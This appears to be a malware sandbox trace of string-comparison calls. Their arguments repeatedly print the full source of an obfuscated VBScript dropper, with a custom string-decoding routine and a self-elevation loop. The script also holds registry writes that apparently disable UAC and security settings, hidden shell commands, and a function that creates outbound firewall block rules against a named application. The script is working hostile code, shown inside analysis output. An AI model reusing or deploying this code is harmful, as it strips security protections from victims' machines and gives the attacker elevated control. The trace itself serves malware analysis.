(fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.283] wcsncmp (_String1="HAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59 [0226.283] wcsncmp (_String1="AVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0226.283] wcsncmp (_String1="VE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 73 [0226.283] wcsncmp (_String1="E7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& 